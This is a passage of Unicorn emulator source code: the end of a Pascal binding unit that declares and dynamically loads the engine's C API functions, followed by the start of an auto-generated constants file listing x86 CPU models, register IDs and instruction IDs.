not used anymore. NOTE: this must be called only when there is no longer usage of Unicorn. The reason is the this API releases some cached memory, thus access to any Unicorn API after uc_close() might crash your application. After this, @uc is invalid, and nolonger usable. @uc: pointer to a handle returned by uc_open() @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_close : function (uc : uc_engine) : uc_err; cdecl; (* Query internal status of engine. @uc: handle returned by uc_open() @type: query type. See uc_query_type @result: save the internal status queried . @return: error code of uc_err enum type (UC_ERR_*, see above) *) uc_query : function (uc : uc_engine; qtype : uc_query_type; result : PCardinal) : uc_err ; cdecl; (* Report the last error number when some API function fail. Like glibc's errno, uc_errno might not retain its old value once accessed. @uc: handle returned by uc_open() @return: error code of uc_err enum type (UC_ERR_*, see above) *) uc_errno : function (uc : uc_engine) : uc_err; cdecl; (* Return a string describing given error code. @code: error code (see UC_ERR_* ) @return: returns a pointer to a string that describes the error code passed in the argument @code *) uc_strerror : function (code : uc_err) : PAnsiChar; cdecl; (* Write to register. @uc: handle returned by uc_open() @regid: register ID that is to be modified. @value: pointer to the value that will set to register @regid . @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ for detailed error). *) uc_reg_write : function (uc : uc_engine; regid : Integer; const value : Pointer) : uc_err; cdecl; (* Read register value. @uc: handle returned by uc_open() @regid: register ID that is to be retrieved. @value: pointer to a variable storing the register value. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_reg_read: function (uc : uc_engine; regid : Integer; value : Pointer) : uc_err; cdecl ; (* Write multiple register values. @uc: handle returned by uc_open() @rges: array of register IDs to store @value: pointer to array of register values @count: length of both *regs and *vals @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_reg_write_batch : function(uc : uc_engine; regs : PIntegerArray; const values : Pointer; count : Integer) : uc_err; cdecl; (* Read multiple register values. @uc: handle returned by uc_open() @rges: array of register IDs to retrieve @value: pointer to array of values to hold registers @count: length of both *regs and *vals @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_reg_read_batch : function(uc : uc_engine; regs : PIntegerArray; var values : Pointer; count : integer) : uc_err; cdecl; (* Write to a range of bytes in memory. @uc: handle returned by uc_open() @address: starting memory address of bytes to set. @bytes: pointer to a variable containing data to be written to memory. @size: size of memory to write to. NOTE: @bytes must be big enough to contain @size bytes. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ for detailed error). *) uc_mem_write_ : function (uc : uc_engine; address : UInt64; const bytes : Pointer; size : Cardinal) : uc_err; cdecl; (* Read a range of bytes in memory. @uc: handle returned by uc_open() @address: starting memory address of bytes to get. @bytes: pointer to a variable containing data copied from memory. @size: size of memory to read. NOTE: @bytes must be big enough to contain @size bytes. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_mem_read_ : function (uc : uc_engine; address : UInt64; bytes : Pointer; size : Cardinal) : uc_err; cdecl; (* Emulate machine code in a specific duration of time. @uc: handle returned by uc_open() @begin: address where emulation starts @until: address where emulation stops (i.e when this address is hit) @timeout: duration to emulate the code (in microseconds). When this value is 0, we will emulate the code in infinite time, until the code is finished. @count: the number of instructions to be emulated. When this value is 0, we will emulate all the code available, until the code is finished. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_emu_start : function (uc : uc_engine; _begin, _until , timeout : UInt64; count : Cardinal) : uc_err; cdecl; (* Stop emulation (which was started by uc_emu_start() API. This is typically called from callback functions registered via tracing APIs. NOTE: for now, this will stop the execution only after the current block. @uc: handle returned by uc_open() @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_emu_stop : function (uc : uc_engine) : uc_err; cdecl; (* function (uc : uc_engine; var hh : uc_hook; _type : integer; callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; args : Array Of Const) : uc_err; cdecl; Register callback for a hook event. The callback will be run when the hook event is hit. @uc: handle returned by uc_open() @hh: hook handle returned from this registration. To be used in uc_hook_del() API @type: hook type @callback: callback to be run when instruction is hit @user_data: user-defined data. This will be passed to callback function in its last argument @user_data @begin: start address of the area where the callback is effect (inclusive) @end: end address of the area where the callback is effect (inclusive) NOTE 1: the callback is called only if related address is in range [@begin, @end] NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered @...: variable arguments (depending on @type) NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT) @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_hook_add : function (uc : uc_engine; var hh : uc_hook; _type : integer; callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; args : Array Of Const) : uc_err; cdecl; //uc_hook_add_1 : function (uc : uc_engine; var hh : uc_hook; _type : integer; // callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; arg1 : integer) : uc_err; cdecl; // //uc_hook_add_2 : function (uc : uc_engine; var hh : uc_hook; _type : integer; // callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; arg1, arg2 : UInt64) : uc_err; cdecl; // (* Unregister (remove) a hook callback. This API removes the hook callback registered by uc_hook_add(). NOTE: this should be called only when you no longer want to trace. After this, @hh is invalid, and nolonger usable. @uc: handle returned by uc_open() @hh: handle returned by uc_hook_add() @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ for detailed error). *) uc_hook_del : function (uc : uc_engine; hh : uc_hook) : uc_err; cdecl ; (* Map memory in for emulation. This API adds a memory region that can be used by emulation. @uc: handle returned by uc_open() @address: starting address of the new memory region to be mapped in. This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. @size: size of the new memory region to be mapped in. This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. @perms: Permissions for the newly mapped region. This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, or this will return with UC_ERR_ARG error. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_mem_map : function (uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32) : uc_err; cdecl; (* Map existing host memory in for emulation. This API adds a memory region that can be used by emulation. @uc: handle returned by uc_open() @address: starting address of the new memory region to be mapped in. This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. @size: size of the new memory region to be mapped in. This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. @perms: Permissions for the newly mapped region. This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, or this will return with UC_ERR_ARG error. @ptr: pointer to host memory backing the newly mapped memory. This host memory is expected to be an equal or larger size than provided, and be mapped with at least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_mem_map_ptr : function(uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32; ptr : Pointer) : uc_err; cdecl; (* Unmap a region of emulation memory. This API deletes a memory mapping from the emulation memory space. @handle: handle returned by uc_open() @address: starting address of the memory region to be unmapped. This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. @size: size of the memory region to be modified. This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ for detailed error). *) uc_mem_unmap : function (uc : uc_engine; address : UInt64; size : Cardinal) : uc_err; cdecl ; (* Set memory permissions for emulation memory. This API changes permissions on an existing memory region. @handle: handle returned by uc_open() @address: starting address of the memory region to be modified. This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. @size: size of the memory region to be modified. This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. @perms: New permissions for the mapped region. This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, or this will return with UC_ERR_ARG error. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ for detailed error). *) uc_mem_protect : function (uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32) : uc_err; cdecl ; (* Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() This API allocates memory for @regions, and user must free this memory later by free() to avoid leaking memory. NOTE: memory regions may be splitted by uc_mem_unmap() @uc: handle returned by uc_open() @regions: pointer to an array of uc_mem_region struct. >> Check "Puc_mem_regionArray" This is allocated by Unicorn, and must be freed by user later. @count: pointer to number of struct uc_mem_region contained in @regions @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_mem_regions : function(uc : uc_engine; var regions : Puc_mem_regionArray; count : PUInt32) : uc_err; cdecl ; (* Allocate a region that can be used with uc_context_{save,restore} to perform quick save/rollback of the CPU context, which includes registers and some internal metadata. Contexts may not be shared across engine instances with differing arches or modes. @uc: handle returned by uc_open() @context: pointer to a uc_engine*. This will be updated with the pointer to the new context on successful return of this function. Later, this allocated memory must be freed with uc_free(). @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_context_alloc : function ( uc : uc_engine; var context : uc_context) : uc_err; cdecl ; (* Free the memory allocated by uc_context_alloc & uc_mem_regions. @mem: memory allocated by uc_context_alloc (returned in *context), or by uc_mem_regions (returned in *regions) @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ for detailed error). *) uc_free : function (context : Pointer) : uc_err; cdecl ; (* Save a copy of the internal CPU context. This API should be used to efficiently make or update a saved copy of the internal CPU state. @uc: handle returned by uc_open() @context: handle returned by uc_context_alloc() @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ for detailed error). *) uc_context_save : function ( uc : uc_engine; context : uc_context) : uc_err; cdecl; (* Restore the current CPU context from a saved copy. This API should be used to roll the CPU context back to a previous state saved by uc_context_save(). @uc: handle returned by uc_open() @context: handle returned by uc_context_alloc that has been used with uc_context_save @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ for detailed error). *) uc_context_restore : function(uc : uc_engine; context : uc_context) : uc_err; cdecl; {============================= Global Functions ================================} // function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer; // callback : Pointer; user_data : Pointer; mBegin, mEnd : UInt64) : uc_err; overload; //function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer; // callback : Pointer; user_data : Pointer; mBegin, mEnd , arg1 : UInt64) : uc_err; overload; //function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer; // callback : Pointer; user_data : Pointer; mBegin, mEnd , arg1, arg2 : UInt64) : uc_err; overload; // function UC_MAKE_VERSION(major,minor : Cardinal): Cardinal; implementation function UC_MAKE_VERSION(major,minor : Cardinal): Cardinal; begin Result := ((major shl 8) + minor); end; var UC_Handle : {$IFDEF FPC}dynlibs.{$ENDIF}HModule; function dyn_loadfunc(name : {$IFDEF FPC}string{$ELSE}PChar{$ENDIF}) : Pointer; begin Result := {$IFDEF FPC}dynlibs.{$ENDIF}GetProcAddress(UC_Handle,name); end; function loadUC(): Boolean; var LastError : String; begin Result := false; UC_Handle := {$IFDEF FPC}dynlibs.{$ENDIF}LoadLibrary(UNICORN_LIB); if UC_Handle <> 0 then begin @uc_version := dyn_loadfunc('uc_version'); if (@uc_version = nil) then exit(false); @uc_arch_supported := dyn_loadfunc('uc_arch_supported'); if (@uc_arch_supported = nil) then exit(false); @uc_open := dyn_loadfunc('uc_open'); if (@uc_open = nil) then exit(false); @uc_close := dyn_loadfunc('uc_close'); if (@uc_close = nil) then exit(false); @uc_query := dyn_loadfunc('uc_query'); if (@uc_query = nil) then exit(false); @uc_errno := dyn_loadfunc('uc_errno'); if (@uc_errno = nil) then exit(false); @uc_strerror := dyn_loadfunc('uc_strerror'); if (@uc_strerror = nil) then exit(false); @uc_reg_write := dyn_loadfunc('uc_reg_write'); if (@uc_reg_write = nil) then exit(false); @uc_reg_read := dyn_loadfunc('uc_reg_read'); if (@uc_reg_read = nil) then exit(false); @uc_reg_write_batch := dyn_loadfunc('uc_reg_write_batch'); if (@uc_reg_write_batch = nil) then exit(false); @uc_reg_read_batch := dyn_loadfunc('uc_reg_read_batch'); if (@uc_reg_read_batch = nil) then exit(false); @uc_mem_write_ := dyn_loadfunc('uc_mem_write'); if (@uc_mem_write_ = nil) then exit(false); @uc_mem_read_ := dyn_loadfunc('uc_mem_read'); if (@uc_mem_read_ = nil) then exit(false); @uc_emu_start := dyn_loadfunc('uc_emu_start'); if (@uc_emu_start = nil) then exit(false); @uc_emu_stop := dyn_loadfunc('uc_emu_stop'); if (@uc_emu_stop = nil) then exit(false); @uc_hook_add := dyn_loadfunc('uc_hook_add'); if (@uc_hook_add = nil) then exit(false); @uc_hook_del := dyn_loadfunc('uc_hook_del'); if (@uc_hook_del = nil) then exit(false); @uc_mem_map := dyn_loadfunc('uc_mem_map'); if (@uc_mem_map = nil) then exit(false); @uc_mem_map_ptr := dyn_loadfunc('uc_mem_map_ptr'); if (@uc_mem_map_ptr = nil) then exit(false); @uc_mem_unmap := dyn_loadfunc('uc_mem_unmap'); if (@uc_mem_unmap = nil) then exit(false); @uc_mem_protect := dyn_loadfunc('uc_mem_protect'); if (@uc_mem_protect = nil) then exit(false); @uc_mem_regions := dyn_loadfunc('uc_mem_regions'); if (@uc_mem_regions = nil) then exit(false); @uc_context_alloc := dyn_loadfunc('uc_context_alloc'); if (@uc_context_alloc = nil) then exit(false); @uc_context_save := dyn_loadfunc('uc_context_save'); if (@uc_context_save = nil) then exit(false); @uc_context_restore := dyn_loadfunc('uc_context_restore'); if (@uc_context_restore = nil) then exit(false); @uc_free := dyn_loadfunc('uc_free'); if (@uc_free = nil) then exit(false); Result := true; end else begin {$IFDEF FPC}TextColor(LightRed);{$ENDIF} LastError := {$IFDEF FPC}GetLoadErrorStr;{$ELSE} {$ifdef mswindows} SysErrorMessage(GetLastError,UC_Handle); SetLastError(0); {$ENDIF} {$ENDIF} WriteLn('error while loading unicorn library : ',LastError,#10); {$IFDEF FPC}NormVideo;{$ENDIF} end; end; procedure FreeUC(); begin if UC_Handle <> 0 then {$IFDEF FPC}dynlibs.{$ENDIF}FreeLibrary(UC_Handle); end; initialization UC_Handle := 0; if not loadUC then halt(0); finalization FreeUC(); end. ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/X86Const.pas��������������������������������������������������0000664�0000000�0000000�00000127511�14675241067�0022031�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit X86Const; interface const // X86 CPU UC_CPU_X86_QEMU64 = 0; UC_CPU_X86_PHENOM = 1; UC_CPU_X86_CORE2DUO = 2; UC_CPU_X86_KVM64 = 3; UC_CPU_X86_QEMU32 = 4; UC_CPU_X86_KVM32 = 5; UC_CPU_X86_COREDUO = 6; UC_CPU_X86_486 = 7; UC_CPU_X86_PENTIUM = 8; UC_CPU_X86_PENTIUM2 = 9; UC_CPU_X86_PENTIUM3 = 10; UC_CPU_X86_ATHLON = 11; UC_CPU_X86_N270 = 12; UC_CPU_X86_CONROE = 13; UC_CPU_X86_PENRYN = 14; UC_CPU_X86_NEHALEM = 15; UC_CPU_X86_WESTMERE = 16; UC_CPU_X86_SANDYBRIDGE = 17; UC_CPU_X86_IVYBRIDGE = 18; UC_CPU_X86_HASWELL = 19; UC_CPU_X86_BROADWELL = 20; UC_CPU_X86_SKYLAKE_CLIENT = 21; UC_CPU_X86_SKYLAKE_SERVER = 22; UC_CPU_X86_CASCADELAKE_SERVER = 23; UC_CPU_X86_COOPERLAKE = 24; UC_CPU_X86_ICELAKE_CLIENT = 25; UC_CPU_X86_ICELAKE_SERVER = 26; UC_CPU_X86_DENVERTON = 27; UC_CPU_X86_SNOWRIDGE = 28; UC_CPU_X86_KNIGHTSMILL = 29; UC_CPU_X86_OPTERON_G1 = 30; UC_CPU_X86_OPTERON_G2 = 31; UC_CPU_X86_OPTERON_G3 = 32; UC_CPU_X86_OPTERON_G4 = 33; UC_CPU_X86_OPTERON_G5 = 34; UC_CPU_X86_EPYC = 35; UC_CPU_X86_DHYANA = 36; UC_CPU_X86_EPYC_ROME = 37; UC_CPU_X86_ENDING = 38; // X86 registers UC_X86_REG_INVALID = 0; UC_X86_REG_AH = 1; UC_X86_REG_AL = 2; UC_X86_REG_AX = 3; UC_X86_REG_BH = 4; UC_X86_REG_BL = 5; UC_X86_REG_BP = 6; UC_X86_REG_BPL = 7; UC_X86_REG_BX = 8; UC_X86_REG_CH = 9; UC_X86_REG_CL = 10; UC_X86_REG_CS = 11; UC_X86_REG_CX = 12; UC_X86_REG_DH = 13; UC_X86_REG_DI = 14; UC_X86_REG_DIL = 15; UC_X86_REG_DL = 16; UC_X86_REG_DS = 17; UC_X86_REG_DX = 18; UC_X86_REG_EAX = 19; UC_X86_REG_EBP = 20; UC_X86_REG_EBX = 21; UC_X86_REG_ECX = 22; UC_X86_REG_EDI = 23; UC_X86_REG_EDX = 24; UC_X86_REG_EFLAGS = 25; UC_X86_REG_EIP = 26; UC_X86_REG_ES = 28; UC_X86_REG_ESI = 29; UC_X86_REG_ESP = 30; UC_X86_REG_FPSW = 31; UC_X86_REG_FS = 32; UC_X86_REG_GS = 33; UC_X86_REG_IP = 34; UC_X86_REG_RAX = 35; UC_X86_REG_RBP = 36; UC_X86_REG_RBX = 37; UC_X86_REG_RCX = 38; UC_X86_REG_RDI = 39; UC_X86_REG_RDX = 40; UC_X86_REG_RIP = 41; UC_X86_REG_RSI = 43; UC_X86_REG_RSP = 44; UC_X86_REG_SI = 45; UC_X86_REG_SIL = 46; UC_X86_REG_SP = 47; UC_X86_REG_SPL = 48; UC_X86_REG_SS = 49; UC_X86_REG_CR0 = 50; UC_X86_REG_CR1 = 51; UC_X86_REG_CR2 = 52; UC_X86_REG_CR3 = 53; UC_X86_REG_CR4 = 54; UC_X86_REG_CR8 = 58; UC_X86_REG_DR0 = 66; UC_X86_REG_DR1 = 67; UC_X86_REG_DR2 = 68; UC_X86_REG_DR3 = 69; UC_X86_REG_DR4 = 70; UC_X86_REG_DR5 = 71; UC_X86_REG_DR6 = 72; UC_X86_REG_DR7 = 73; UC_X86_REG_FP0 = 82; UC_X86_REG_FP1 = 83; UC_X86_REG_FP2 = 84; UC_X86_REG_FP3 = 85; UC_X86_REG_FP4 = 86; UC_X86_REG_FP5 = 87; UC_X86_REG_FP6 = 88; UC_X86_REG_FP7 = 89; UC_X86_REG_K0 = 90; UC_X86_REG_K1 = 91; UC_X86_REG_K2 = 92; UC_X86_REG_K3 = 93; UC_X86_REG_K4 = 94; UC_X86_REG_K5 = 95; UC_X86_REG_K6 = 96; UC_X86_REG_K7 = 97; UC_X86_REG_MM0 = 98; UC_X86_REG_MM1 = 99; UC_X86_REG_MM2 = 100; UC_X86_REG_MM3 = 101; UC_X86_REG_MM4 = 102; UC_X86_REG_MM5 = 103; UC_X86_REG_MM6 = 104; UC_X86_REG_MM7 = 105; UC_X86_REG_R8 = 106; UC_X86_REG_R9 = 107; UC_X86_REG_R10 = 108; UC_X86_REG_R11 = 109; UC_X86_REG_R12 = 110; UC_X86_REG_R13 = 111; UC_X86_REG_R14 = 112; UC_X86_REG_R15 = 113; UC_X86_REG_ST0 = 114; UC_X86_REG_ST1 = 115; UC_X86_REG_ST2 = 116; UC_X86_REG_ST3 = 117; UC_X86_REG_ST4 = 118; UC_X86_REG_ST5 = 119; UC_X86_REG_ST6 = 120; UC_X86_REG_ST7 = 121; UC_X86_REG_XMM0 = 122; UC_X86_REG_XMM1 = 123; UC_X86_REG_XMM2 = 124; UC_X86_REG_XMM3 = 125; UC_X86_REG_XMM4 = 126; UC_X86_REG_XMM5 = 127; UC_X86_REG_XMM6 = 128; UC_X86_REG_XMM7 = 129; UC_X86_REG_XMM8 = 130; UC_X86_REG_XMM9 = 131; UC_X86_REG_XMM10 = 132; UC_X86_REG_XMM11 = 133; UC_X86_REG_XMM12 = 134; UC_X86_REG_XMM13 = 135; UC_X86_REG_XMM14 = 136; UC_X86_REG_XMM15 = 137; UC_X86_REG_XMM16 = 138; UC_X86_REG_XMM17 = 139; UC_X86_REG_XMM18 = 140; UC_X86_REG_XMM19 = 141; UC_X86_REG_XMM20 = 142; UC_X86_REG_XMM21 = 143; UC_X86_REG_XMM22 = 144; UC_X86_REG_XMM23 = 145; UC_X86_REG_XMM24 = 146; UC_X86_REG_XMM25 = 147; UC_X86_REG_XMM26 = 148; UC_X86_REG_XMM27 = 149; UC_X86_REG_XMM28 = 150; UC_X86_REG_XMM29 = 151; UC_X86_REG_XMM30 = 152; UC_X86_REG_XMM31 = 153; UC_X86_REG_YMM0 = 154; UC_X86_REG_YMM1 = 155; UC_X86_REG_YMM2 = 156; UC_X86_REG_YMM3 = 157; UC_X86_REG_YMM4 = 158; UC_X86_REG_YMM5 = 159; UC_X86_REG_YMM6 = 160; UC_X86_REG_YMM7 = 161; UC_X86_REG_YMM8 = 162; UC_X86_REG_YMM9 = 163; UC_X86_REG_YMM10 = 164; UC_X86_REG_YMM11 = 165; UC_X86_REG_YMM12 = 166; UC_X86_REG_YMM13 = 167; UC_X86_REG_YMM14 = 168; UC_X86_REG_YMM15 = 169; UC_X86_REG_YMM16 = 170; UC_X86_REG_YMM17 = 171; UC_X86_REG_YMM18 = 172; UC_X86_REG_YMM19 = 173; UC_X86_REG_YMM20 = 174; UC_X86_REG_YMM21 = 175; UC_X86_REG_YMM22 = 176; UC_X86_REG_YMM23 = 177; UC_X86_REG_YMM24 = 178; UC_X86_REG_YMM25 = 179; UC_X86_REG_YMM26 = 180; UC_X86_REG_YMM27 = 181; UC_X86_REG_YMM28 = 182; UC_X86_REG_YMM29 = 183; UC_X86_REG_YMM30 = 184; UC_X86_REG_YMM31 = 185; UC_X86_REG_ZMM0 = 186; UC_X86_REG_ZMM1 = 187; UC_X86_REG_ZMM2 = 188; UC_X86_REG_ZMM3 = 189; UC_X86_REG_ZMM4 = 190; UC_X86_REG_ZMM5 = 191; UC_X86_REG_ZMM6 = 192; UC_X86_REG_ZMM7 = 193; UC_X86_REG_ZMM8 = 194; UC_X86_REG_ZMM9 = 195; UC_X86_REG_ZMM10 = 196; UC_X86_REG_ZMM11 = 197; UC_X86_REG_ZMM12 = 198; UC_X86_REG_ZMM13 = 199; UC_X86_REG_ZMM14 = 200; UC_X86_REG_ZMM15 = 201; UC_X86_REG_ZMM16 = 202; UC_X86_REG_ZMM17 = 203; UC_X86_REG_ZMM18 = 204; UC_X86_REG_ZMM19 = 205; UC_X86_REG_ZMM20 = 206; UC_X86_REG_ZMM21 = 207; UC_X86_REG_ZMM22 = 208; UC_X86_REG_ZMM23 = 209; UC_X86_REG_ZMM24 = 210; UC_X86_REG_ZMM25 = 211; UC_X86_REG_ZMM26 = 212; UC_X86_REG_ZMM27 = 213; UC_X86_REG_ZMM28 = 214; UC_X86_REG_ZMM29 = 215; UC_X86_REG_ZMM30 = 216; UC_X86_REG_ZMM31 = 217; UC_X86_REG_R8B = 218; UC_X86_REG_R9B = 219; UC_X86_REG_R10B = 220; UC_X86_REG_R11B = 221; UC_X86_REG_R12B = 222; UC_X86_REG_R13B = 223; UC_X86_REG_R14B = 224; UC_X86_REG_R15B = 225; UC_X86_REG_R8D = 226; UC_X86_REG_R9D = 227; UC_X86_REG_R10D = 228; UC_X86_REG_R11D = 229; UC_X86_REG_R12D = 230; UC_X86_REG_R13D = 231; UC_X86_REG_R14D = 232; UC_X86_REG_R15D = 233; UC_X86_REG_R8W = 234; UC_X86_REG_R9W = 235; UC_X86_REG_R10W = 236; UC_X86_REG_R11W = 237; UC_X86_REG_R12W = 238; UC_X86_REG_R13W = 239; UC_X86_REG_R14W = 240; UC_X86_REG_R15W = 241; UC_X86_REG_IDTR = 242; UC_X86_REG_GDTR = 243; UC_X86_REG_LDTR = 244; UC_X86_REG_TR = 245; UC_X86_REG_FPCW = 246; UC_X86_REG_FPTAG = 247; UC_X86_REG_MSR = 248; UC_X86_REG_MXCSR = 249; UC_X86_REG_FS_BASE = 250; UC_X86_REG_GS_BASE = 251; UC_X86_REG_FLAGS = 252; UC_X86_REG_RFLAGS = 253; UC_X86_REG_FIP = 254; UC_X86_REG_FCS = 255; UC_X86_REG_FDP = 256; UC_X86_REG_FDS = 257; UC_X86_REG_FOP = 258; UC_X86_REG_ENDING = 259; // X86 instructions UC_X86_INS_INVALID = 0; UC_X86_INS_AAA = 1; UC_X86_INS_AAD = 2; UC_X86_INS_AAM = 3; UC_X86_INS_AAS = 4; UC_X86_INS_FABS = 5; UC_X86_INS_ADC = 6; UC_X86_INS_ADCX = 7; UC_X86_INS_ADD = 8; UC_X86_INS_ADDPD = 9; UC_X86_INS_ADDPS = 10; UC_X86_INS_ADDSD = 11; UC_X86_INS_ADDSS = 12; UC_X86_INS_ADDSUBPD = 13; UC_X86_INS_ADDSUBPS = 14; UC_X86_INS_FADD = 15; UC_X86_INS_FIADD = 16; UC_X86_INS_FADDP = 17; UC_X86_INS_ADOX = 18; UC_X86_INS_AESDECLAST = 19; UC_X86_INS_AESDEC = 20; UC_X86_INS_AESENCLAST = 21; UC_X86_INS_AESENC = 22; UC_X86_INS_AESIMC = 23; UC_X86_INS_AESKEYGENASSIST = 24; UC_X86_INS_AND = 25; UC_X86_INS_ANDN = 26; UC_X86_INS_ANDNPD = 27; UC_X86_INS_ANDNPS = 28; UC_X86_INS_ANDPD = 29; UC_X86_INS_ANDPS = 30; UC_X86_INS_ARPL = 31; UC_X86_INS_BEXTR = 32; UC_X86_INS_BLCFILL = 33; UC_X86_INS_BLCI = 34; UC_X86_INS_BLCIC = 35; UC_X86_INS_BLCMSK = 36; UC_X86_INS_BLCS = 37; UC_X86_INS_BLENDPD = 38; UC_X86_INS_BLENDPS = 39; UC_X86_INS_BLENDVPD = 40; UC_X86_INS_BLENDVPS = 41; UC_X86_INS_BLSFILL = 42; UC_X86_INS_BLSI = 43; UC_X86_INS_BLSIC = 44; UC_X86_INS_BLSMSK = 45; UC_X86_INS_BLSR = 46; UC_X86_INS_BOUND = 47; UC_X86_INS_BSF = 48; UC_X86_INS_BSR = 49; UC_X86_INS_BSWAP = 50; UC_X86_INS_BT = 51; UC_X86_INS_BTC = 52; UC_X86_INS_BTR = 53; UC_X86_INS_BTS = 54; UC_X86_INS_BZHI = 55; UC_X86_INS_CALL = 56; UC_X86_INS_CBW = 57; UC_X86_INS_CDQ = 58; UC_X86_INS_CDQE = 59; UC_X86_INS_FCHS = 60; UC_X86_INS_CLAC = 61; UC_X86_INS_CLC = 62; UC_X86_INS_CLD = 63; UC_X86_INS_CLFLUSH = 64; UC_X86_INS_CLFLUSHOPT = 65; UC_X86_INS_CLGI = 66; UC_X86_INS_CLI = 67; UC_X86_INS_CLTS = 68; UC_X86_INS_CLWB = 69; UC_X86_INS_CMC = 70; UC_X86_INS_CMOVA = 71; UC_X86_INS_CMOVAE = 72; UC_X86_INS_CMOVB = 73; UC_X86_INS_CMOVBE = 74; UC_X86_INS_FCMOVBE = 75; UC_X86_INS_FCMOVB = 76; UC_X86_INS_CMOVE = 77; UC_X86_INS_FCMOVE = 78; UC_X86_INS_CMOVG = 79; UC_X86_INS_CMOVGE = 80; UC_X86_INS_CMOVL = 81; UC_X86_INS_CMOVLE = 82; UC_X86_INS_FCMOVNBE = 83; UC_X86_INS_FCMOVNB = 84; UC_X86_INS_CMOVNE = 85; UC_X86_INS_FCMOVNE = 86; UC_X86_INS_CMOVNO = 87; UC_X86_INS_CMOVNP = 88; UC_X86_INS_FCMOVNU = 89; UC_X86_INS_CMOVNS = 90; UC_X86_INS_CMOVO = 91; UC_X86_INS_CMOVP = 92; UC_X86_INS_FCMOVU = 93; UC_X86_INS_CMOVS = 94; UC_X86_INS_CMP = 95; UC_X86_INS_CMPPD = 96; UC_X86_INS_CMPPS = 97; UC_X86_INS_CMPSB = 98; UC_X86_INS_CMPSD = 99; UC_X86_INS_CMPSQ = 100; UC_X86_INS_CMPSS = 101; UC_X86_INS_CMPSW = 102; UC_X86_INS_CMPXCHG16B = 103; UC_X86_INS_CMPXCHG = 104; UC_X86_INS_CMPXCHG8B = 105; UC_X86_INS_COMISD = 106; UC_X86_INS_COMISS = 107; UC_X86_INS_FCOMP = 108; UC_X86_INS_FCOMPI = 109; UC_X86_INS_FCOMI = 110; UC_X86_INS_FCOM = 111; UC_X86_INS_FCOS = 112; UC_X86_INS_CPUID = 113; UC_X86_INS_CQO = 114; UC_X86_INS_CRC32 = 115; UC_X86_INS_CVTDQ2PD = 116; UC_X86_INS_CVTDQ2PS = 117; UC_X86_INS_CVTPD2DQ = 118; UC_X86_INS_CVTPD2PS = 119; UC_X86_INS_CVTPS2DQ = 120; UC_X86_INS_CVTPS2PD = 121; UC_X86_INS_CVTSD2SI = 122; UC_X86_INS_CVTSD2SS = 123; UC_X86_INS_CVTSI2SD = 124; UC_X86_INS_CVTSI2SS = 125; UC_X86_INS_CVTSS2SD = 126; UC_X86_INS_CVTSS2SI = 127; UC_X86_INS_CVTTPD2DQ = 128; UC_X86_INS_CVTTPS2DQ = 129; UC_X86_INS_CVTTSD2SI = 130; UC_X86_INS_CVTTSS2SI = 131; UC_X86_INS_CWD = 132; UC_X86_INS_CWDE = 133; UC_X86_INS_DAA = 134; UC_X86_INS_DAS = 135; UC_X86_INS_DATA16 = 136; UC_X86_INS_DEC = 137; UC_X86_INS_DIV = 138; UC_X86_INS_DIVPD = 139; UC_X86_INS_DIVPS = 140; UC_X86_INS_FDIVR = 141; UC_X86_INS_FIDIVR = 142; UC_X86_INS_FDIVRP = 143; UC_X86_INS_DIVSD = 144; UC_X86_INS_DIVSS = 145; UC_X86_INS_FDIV = 146; UC_X86_INS_FIDIV = 147; UC_X86_INS_FDIVP = 148; UC_X86_INS_DPPD = 149; UC_X86_INS_DPPS = 150; 